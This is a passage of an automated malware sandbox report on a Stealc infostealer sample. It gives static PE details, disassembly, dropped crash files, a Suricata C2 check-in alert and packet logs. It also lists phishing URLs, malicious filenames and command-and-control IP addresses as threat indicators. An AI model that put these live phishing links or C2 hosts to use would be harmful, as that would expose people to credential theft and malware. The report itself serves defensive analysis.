	file.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
s-part-0044.t-0009.fb-t-msedge.net	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse	13.107.253.72
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.253.72
	original.eml	Get hash	malicious	Tycoon2FA	Browse	13.107.253.72
	http://www.twbcompany.com	Get hash	malicious	Unknown	Browse	13.107.253.72
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	13.107.253.72
	https://pub-53d8c8824459455a8bb62d4b9a0d5f2f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	http://ikergalindez.github.io/gofish/	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	Statement of Account COFCO Pte Ltd.exe	Get hash	malicious	FormBook	Browse	13.107.253.72

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TNNET-ASTNNetOyMainnetworkFI	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150
	0h5IfpqflF.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	552RZ9fPMe.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	vmgon5Zqja.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.159
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.159
	956d73b7f041.exe	Get hash	malicious	Stealc	Browse	62.204.41.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	TuQlz67byH.exe	Get hash	malicious	LummaC	Browse	13.107.253.72
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	13.107.253.72
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	13.107.253.72
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.253.72
	https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF	Get hash	malicious	Unknown	Browse	13.107.253.72
	https://future.nhs.uk	Get hash	malicious	Unknown	Browse	13.107.253.72
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.253.72
	https://fenster-mark-gmbhsharefile.btn-ebikes.com/	Get hash	malicious	Unknown	Browse	13.107.253.72
	Hscni Remittance_8115919700_16831215.html	Get hash	malicious	Tycoon2FA	Browse	13.107.253.72
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	13.107.253.72

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aew8SXjXEb.exe_f6e7fff469788cb2a77365499845ec8544602f72_b1bf4f91_064bad09-4bab-48b2-ad3d-1b452802d532\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6552070716266695
Encrypted:	false
SSDEEP:	96:AuFoEIoQ0K2sgy9KAwf5QXIDcQvc6QcEVcw3cE/X+HbHg/5hZAX/d5FMT2SlPkpL:vBIoQj2Y0BU/wjhzuiF/Z24IO8u
MD5:	36FD7A1DCB3C1247D34FAF4FADC98F7C
SHA1:	82259CBEA81843A002FCB5D09C6FCF534645D7C3
SHA-256:	A9D94DCE4125DAA1D64712153B21CFDCF71CB51B2C4DD2E15F213FB383A4BAF2
SHA-512:	7121243554B4E64E44573FC37DC6B479BDCC04E0A4D03D51F16D5B201A93606952C1266F610694E812205D74288053D0B83C5186DC94B1086D2CE20405D5845C
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.5.9.9.3.7.2.9.4.6.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.5.9.9.4.0.8.8.8.3.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.4.b.a.d.0.9.-.4.b.a.b.-.4.8.b.2.-.a.d.3.d.-.1.b.4.5.2.8.0.2.d.5.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.b.9.3.c.a.2.-.a.1.3.2.-.4.a.b.4.-.9.8.e.f.-.e.9.b.8.4.6.c.a.7.f.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.e.w.8.S.X.j.X.E.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.r.o.q.u.o.t.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.9.0.-.0.0.0.1.-.0.0.1.4.-.3.d.a.d.-.4.5.f.c.d.e.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.7.d.0.3.f.6.a.1.a.a.4.5.0.5.0.f.7.b.e.5.5.f.8.7.6.f.e.a.2.d.c.0.0.0.0.0.9.0.4.!.0.0.0.0.7.a.1.d.b.4.e.5.b.c.d.b.c.f.a.1.f.c.d.8.5.9.1.d.2.e.3.e.e.8.7.0.8.a.b.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Oct 7 17:33:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	33388
Entropy (8bit):	1.7315578571379966
Encrypted:	false
SSDEEP:	96:5u8eDXCte5Tfmi779PYB4k5/7PjqBB7wgoWI0WI4UI4g6Y9PnQDtUm:rImOSFo7wog6Y9PQDtU
MD5:	2325E982C3AF62E750D1603C40D0F123
SHA1:	948BE6836B448E5CBBFC9A69757916F386C7892F
SHA-256:	2C3EA01BF708AC90799D20B9A5129A4F70E152128FB74013C71A5B2D49A87235
SHA-512:	DE8593A263DC8EBEFC45347D0059EA9A56B951112060B2C45F2055511BCF1AA69B92FB38B9575F5DBB94644C7C7DAF93BD697B710737FC54B9F807FD4A3D424B
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......Y..g........................d...........................T.......8...........T................w......................................................................................................eJ..............GenuineIntel............T...........Y..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.7044698082073695
Encrypted:	false
SSDEEP:	192:R6l7wVeJLt6K6YSTSUzgmfo11FprZ89bcosfYh0m:R6lXJx6K6YmSUzgmfo11OcbfYH
MD5:	142D9434D1EC2F75490E7C485B5AC575
SHA1:	A39C28EA27C19E1DA913ECE7307CC790366A68C9
SHA-256:	73FDF55048AD4FF2BFD6D089522A0BC095BAAD1B5F398C3F42D3A728F3D360C4
SHA-512:	B7DB8D6856AF221CC135DB2464D24630A8741A21D1654CD4B2DC8DCCBAE005CB48FA695ECF7D92CC79C48AE0FF970C3205693A2D3C08312FDBFD0D71ADEA4C12
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4678
Entropy (8bit):	4.499279508688192
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDuJg77aI9c/WpW8VYzYm8M4Jx3FMx+q8wKFaQlbZd:uIjfDkI72u7VTJOyaQlbZd
MD5:	6C37C69F2F4B0278BAD9A9F204224A90
SHA1:	E046DDACD1A56512F78213998667C9D9891C870E
SHA-256:	BBA640E7FF19AF0A052B0EB601DCDE79A7DFF15E34AE67FF87F237C0A61FC853
SHA-512:	1182745E9BB2922FF7147749114EE3233F906E6C557659719FE65792C0384DCC921885B9C8889051F214990F79451FD9C56781B61C307F98B4FD97873EB55FA4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533315" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.37270797884068
Encrypted:	false
SSDEEP:	6144:MFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNFiL:8V1QyWWI/glMM6kF7Tq
MD5:	B0D377AC8D346D6CE1784252F32A3AD7
SHA1:	339AEFB092BCFB6C7180D9A96ADB8A4808EC806B
SHA-256:	3F50A580BA5EC6EBF8DD448FE2A98B5155D63CE2D57810DC9398BF0599CB4C45
SHA-512:	B691F30909137ACA72258D70B0493075B43E55F93791D4DCEA65EF23E16C1D78DFFFB06D5658D3B27740D83260533D264A2555DEDF8C39136D1389EC0BD82064
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.682336805567385
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Aew8SXjXEb.exe
File size:	505'344 bytes
MD5:	c89c82ab6576a83a2a32bbffe44ef4d7
SHA1:	7a1db4e5bcdbcfa1fcd8591d2e3ee8708ab41a02
SHA256:	11cb48154b2285d427e5f3bff51c1dde9f59a8b8cfd04fa4d3d3f6e4b0124d44
SHA512:	be6f1b11dd4ec57e44ba70485a129e4c7a42261e9f1a5909026bd4b19c1d7ee445baaf775c9650761271051719cea1354e55902872d64c5180aa5271f122e862
SSDEEP:	12288:CQJlka1Ilavm3yVUhEgPlV2fBqT5OY4S:Cza1WLliBqA
TLSH:	48B4F15174C18072D573223206F5DAB56E3EB8710A62AEDF67840FBE4F30291E7319AB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406f52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67041216 [Mon Oct 7 16:53:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d10af643340e1121562abe3e6bd5b0e1

Entrypoint Preview

Instruction
call 00007F431C68F460h
jmp 00007F431C68E9CFh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F431C68EB6Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F431C68EB5Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F431C68EB5Eh
add edx, 28h
cmp edx, esi
jne 00007F431C68EB3Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F431C68EB4Bh
push esi
call 00007F431C68F774h
test eax, eax
je 00007F431C68EB72h
mov eax, dword ptr fs:[00000018h]
mov esi, 0047B34Ch
mov edx, dword ptr [eax+04h]
jmp 00007F431C68EB56h
cmp edx, eax
je 00007F431C68EB62h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F431C68EB42h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F431C68EB59h
mov byte ptr [0047B350h], 00000001h
call 00007F431C68EE0Ah
call 00007F431C691D27h
test al, al
jne 00007F431C68EB56h
xor al, al
pop ebp
ret
call 00007F431C69A789h
test al, al
jne 00007F431C68EB5Ch
push 00000000h
call 00007F431C691D2Eh
pop ecx
jmp 00007F431C68EB3Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0047B351h], 00000000h
je 00007F431C68EB56h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c6c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7d000	0x1ad4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2abc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ab00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210f0	0x21200	15b4eac2d210513051a585f07a7e32c6	False	0.5865713443396227	data	6.670163410877792	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x9d78	0x9e00	bf0b7580d5fe33f288e589cde1691485	False	0.43517602848101267	data	4.9591797408068725	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2d000	0x4ef78	0x4e200	09b23c62cc20b3a796248a28654b24fd	False	0.989946875	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	7.990487855371462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x7c000	0x3d8	0x400	5584c2fd2a321b3ff4d89d84727643be	False	0.4404296875	data	3.290569201128903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7d000	0x1ad4	0x1c00	16092792d232aa39e24b762c0f4a37ab	False	0.7273995535714286	data	6.393192590005456	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7c058	0x380	data	English	United States	0.46205357142857145

Imports

DLL

Import

KERNEL32.dll

AttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T19:33:15.882048+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.8	49707	62.204.41.150	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 19:33:10.857407093 CEST	49673	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:11.214905024 CEST	49672	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:11.996170998 CEST	49676	443	192.168.2.8	52.182.143.211
Oct 7, 2024 19:33:14.621141911 CEST	49677	80	192.168.2.8	192.229.211.108
Oct 7, 2024 19:33:14.710458994 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:14.715482950 CEST	80	49707	62.204.41.150	192.168.2.8
Oct 7, 2024 19:33:14.715569019 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:14.715749979 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:14.720732927 CEST	80	49707	62.204.41.150	192.168.2.8
Oct 7, 2024 19:33:15.399121046 CEST	80	49707	62.204.41.150	192.168.2.8
Oct 7, 2024 19:33:15.399189949 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:15.403103113 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:15.408018112 CEST	80	49707	62.204.41.150	192.168.2.8
Oct 7, 2024 19:33:15.878268957 CEST	80	49707	62.204.41.150	192.168.2.8
Oct 7, 2024 19:33:15.882047892 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:17.163652897 CEST	49707	80	192.168.2.8	62.204.41.150
Oct 7, 2024 19:33:20.464867115 CEST	49673	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:20.824311972 CEST	49672	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:22.516761065 CEST	443	49706	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:22.516905069 CEST	49706	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.714260101 CEST	49706	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.714375973 CEST	49706	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.718080997 CEST	49723	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.718130112 CEST	443	49723	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.718245029 CEST	49723	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.718493938 CEST	49723	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.718518972 CEST	443	49723	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.721349955 CEST	443	49706	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.721373081 CEST	443	49706	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.731960058 CEST	443	49723	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.734992981 CEST	49724	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.735017061 CEST	443	49724	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.735075951 CEST	49724	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.736126900 CEST	49724	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:33:31.736164093 CEST	443	49724	23.206.229.226	192.168.2.8
Oct 7, 2024 19:33:31.736212969 CEST	49724	443	192.168.2.8	23.206.229.226
Oct 7, 2024 19:34:28.011496067 CEST	49730	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.011529922 CEST	443	49730	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.011758089 CEST	49730	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.012335062 CEST	49730	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.012351990 CEST	443	49730	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.024524927 CEST	443	49730	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.024915934 CEST	49731	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.024935961 CEST	443	49731	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.025052071 CEST	49731	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.025343895 CEST	49731	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.025357008 CEST	443	49731	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.537823915 CEST	443	49731	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.538741112 CEST	443	49731	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.538829088 CEST	49731	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.604162931 CEST	49731	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.604176998 CEST	443	49731	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.634665966 CEST	49732	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.634710073 CEST	443	49732	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.634732962 CEST	49733	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.634759903 CEST	443	49733	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.634769917 CEST	49732	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.634803057 CEST	49733	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.635426998 CEST	49732	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.635440111 CEST	443	49732	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.635719061 CEST	49733	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.635732889 CEST	443	49733	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.636101007 CEST	49734	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.636112928 CEST	443	49734	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.636168957 CEST	49734	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.636323929 CEST	49734	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.636348009 CEST	443	49734	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.637321949 CEST	49735	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637345076 CEST	443	49735	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.637413979 CEST	49735	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637533903 CEST	49735	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637545109 CEST	443	49735	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.637629986 CEST	49736	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637681961 CEST	443	49736	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.637733936 CEST	49736	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637840033 CEST	49736	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.637859106 CEST	443	49736	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.646912098 CEST	443	49732	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647197008 CEST	49737	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647227049 CEST	443	49737	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647250891 CEST	443	49733	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647301912 CEST	49737	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647484064 CEST	49737	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647496939 CEST	443	49737	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647525072 CEST	49738	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647535086 CEST	443	49738	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647593021 CEST	49738	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647685051 CEST	49738	443	192.168.2.8	13.107.253.72
Oct 7, 2024 19:34:28.647692919 CEST	443	49738	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.647888899 CEST	443	49734	13.107.253.72	192.168.2.8
Oct 7, 2024 19:34:28.648102999 CEST	49739	443	192.168.2.8	13.107.253.72
